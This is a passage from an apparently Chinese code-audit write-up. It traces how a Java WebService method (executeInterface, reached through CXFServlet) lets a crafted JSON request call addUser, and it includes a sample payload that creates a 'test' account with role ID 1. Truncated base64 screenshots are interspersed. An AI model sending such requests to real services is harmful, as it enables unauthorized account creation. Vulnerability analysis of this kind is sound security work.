<span class=hljs-attr>"param"</span>: {<span class=hljs-attr>"orgCode"</span>:<span class=hljs-string>"001"</span>,<span class=hljs-attr>"loginName"</span>:<span class=hljs-string>"test"</span>,<span class=hljs-attr>"roleIds"</span>:<span class=hljs-string>"1"</span>,<span class=hljs-attr>"loginPass"</span>:<span class=hljs-string>"test"</span>,<span class=hljs-attr>"isReuse"</span>:<span class=hljs-number>0</span>,<span class=hljs-attr>"oldLoginName"</span>:<span class=hljs-string>"xxx"</span>,<span class=hljs-attr>"oldRoleIds"</span>:<span class=hljs-string>"1"</span>,<span class=hljs-attr>"userName"</span>:<span class=hljs-string>"test"</span>},
|
|||
|
|
<span class=hljs-attr>"paramStr"</span>: <span class=hljs-string>"11"</span>,
|
|||
|
|
<span class=hljs-attr>"langLocale"</span>: <span class=hljs-string>"11"</span>,
|
|||
|
|
<span class=hljs-attr>"orders"</span>: [{<span class=hljs-attr>"propertyName"</span>: <span class=hljs-string>"1"</span>,<span class=hljs-attr>"isAscending"</span>: <span class=hljs-literal>true</span>}]
|
|||
|
|
}
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=23>其中param对应了初始化ExUserBean对象的变量值</p>
|
|||
|
|
<p blockindex=24><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=25>那么executeInterface方法在哪调用呢?</p>
|
|||
|
|
<p blockindex=26>我们发现AdminWebServiceImpl类注解为@WebService</p>
|
|||
|
|
<pre blockindex=27><code class="hljs language-java"><span class=hljs-meta>@WebService(
|
|||
|
|
targetNamespace = "http://webservice.dhsoft.com"
|
|||
|
|
)</span>
|
|||
|
|
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>AdminWebServiceImpl</span> <span class=hljs-keyword>implements</span> <span class=hljs-title>AdminWebService</span>
|
|||
|
|
</span></code></pre>
|
|||
|
|
<blockquote blockindex=28>
|
|||
|
|
<p>WebService是一种跨编程语言和跨操作系统平台的远程调用技术。</p>
|
|||
|
|
<p>所谓跨编程语言和跨操作平台,就是说服务端程序采用java编写,客户端程序则可以采用其他编程语言编写,反之亦然!跨操作系统平台则是指服务端程序和客户端程序可以在不同的操作系统上运行。</p>
|
|||
|
|
<p>Java中常用注解来注册WebService服务,常见注解有</p>
|
|||
|
|
<p>@WebService:此注示用来标明此java类为某个WebService的实现类或者标明此java接口定义了某个WebService的接口。即定义服务</p>
|
|||
|
|
<p>@WebMethod:定义方法,在公共方法上面表示该方法要作为服务发布,仅支持在使用@webservice注解来注解的类上使用@WebMethod注解</p>
|
|||
|
|
<p>@WebResult:注解用于定制从返回值至 WSDL 部件或 XML 元素的映射。即定义返回值</p>
|
|||
|
|
<p>@WebParam: 注解用于定制从单个参数至 Web Service 消息部件(message元素)和 XML 元素的映射。即定义参数</p>
|
|||
|
|
</blockquote>
|
|||
|
|
<p blockindex=29>向上进入AdminWebService接口</p>
|
|||
|
|
<p blockindex=30><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=31>其中定义了interfaceMethodsMap数组interfaceId的具体值,我们调用addUser时interfaceId=admin_011_002;并且将executeInterface注册在了WebService服务中。</p>
|
|||
|
|
<p blockindex=32>根据java中WebService的配置,我们在配置文件中找的AdminWebService注册的路由(厚码保命)</p>
|
|||
|
|
<p blockindex=33><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=34>而在web.xml中WebService服务是由CXFServlet来处理的</p>
|
|||
|
|
<p blockindex=35><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAioAAAD6CAIAAAAA8/viAAAgAElEQVR4nOzdd1ybR544/s88aiA6AtFFtQFTbIwrzQY33GM7G8cpm8R3advul/smt3u732x97SW5Te6yyV6yuf2m2inO2ptAHBt33I0NLggQwvQiJCSh3vXM/P7A2IBBwhgbY8/7L9BTZp55Rs/nmXlGz6C0zHlAURRFUXcXM9UZoCiKoh5ENPxQFEVRU4CGH4qiKGoK0PBDURRFTQEafiiKoqgpQMMPRVEUNQVo+KEoiqKmAA0/FEVR1BSg4YeiKIqaAtypzsAkIP5JO3Ml4QgBQEdb1fMd1qnOEUVRFOUFJ0wcPdV5uG1O0xml4rtuY0hEeLCpZ6/BNf5NiW/sG3NTIvWKWhe6cxmkKIqiRpjMzjcCfolzM8OBTOI+xwOBW+Ww99gcE2n1MPwoX77vzfuMzM6JEwK+28dCURT1gJiczjeCwVeSt3rjqtkh6sOKOrUSAICAz/Lk1G3iwEgu0TusDcqOTzo1CkAD6ydEpPwoMSJVwFhtuopm+Wf9TmAQAMxJyXs9VoC1jY82kxfSExf5CwSahrV1KsKNer0gjddy+uUeFwAQzP1BTv5jzvqt9WoX46nhMlZaBAe9VJBTykcAsGV+yRYArJZtlPa6GEQwis0oXrN08/zqfeUVVUoHbRhRFEVNsknofCO86NwNTz++fja/7fBXO3bX6a59HhGT9YaEc0xW/26n8pKFjfZjZBqTCSEAEIbOfDsjpK218Z323iYU/sMUsaOvV84iANAaVOdxcGmoMC1M5FTKD7GiVLdyt84BrFUQGLdG6NirNDoQAm7EMzNCWtvlx+3X8+GzWBIVflPn25hpEadMrdyvY/LE/BPSC6+1dpepjQYCAIAQGFrOX+6E+EWlpYXpPqbOjl4zRjQIURRFTZrbav0QzIiy125alx9plVZ+/MmZFiMZ0hAJ4PEY4uy3WdptuN1mvqSBgfYNwZzlsVE+qrq3FDrMoKutTWni+cvEvmVddgBwsU6lG4MgyK/3ws+7LOnxZhl2AgBi8Ik+3Ytp4XncngoM/qKwWVj7uhYDeG76jJkWYojRYTdw3RiI1WFTDG/iIIaYWiu/fOfijKJNax96KSP3xN5v9st1tC+Ooihqctxm51tgVlFhlPHIRx9UKFgEwzvBmrubykMzn5mfv86ou6DpLVNouvDACv7JAUjIzSyLuHY1ZxDo+AIA+42NifFAj4UwqKHrym8HPzNp+q6Q1EVhzH4l5IUF29Wyc9jr06txpDU2hI3NlZ++37bu+e1L89OPy89YxrMVRVEU5dVthh+DtPJk8vrip38iqiwrP9NqGhqBkFv/XvXp3YGivHDxCknm8siuV2tapOTaClql7Ndd5usru1y24Xt26Jw3hRa3+mT/zBdFYfw+siCUXGjQuD0+9bnOW1pjIkxgStGGtUsyuO3HTjXQ8dwURVGT5rbCD2JIf8N3H16tzl3z8Mrtr8ypPVi+73S3ddgKarOmzKz5zpC2OyuqJKhFqgcAc4eZrPDlmSwWzfjix+De8Cm1/sczwxeLcA7RvNVPhve8kdG6xrymRTCgm5cQDIHJhaXrV2T4qarK3j58Uel5gANFURR1SyZh6AHCZoXs/MUWZ9S8VauXpruaqrssQDAnf0b2s0HIyhIez29JTOxCof1Ye28jixAiPS7flfExszn2LgeKCBQ/lSAyaXV9gACAx+FLgiNLg0GqMurAbR0eUpw2lCGJzff39dF3vq22kqHDAQhJFMctFLjaLS6Rvw9YHBbkJS0AAJafGxs5A1mbbRARFBTutKgJIhjFLvvpc5szkbzi8x17LnVb6LgDiqKoyTU5PztFCNzGroYLNV1mXXdznw0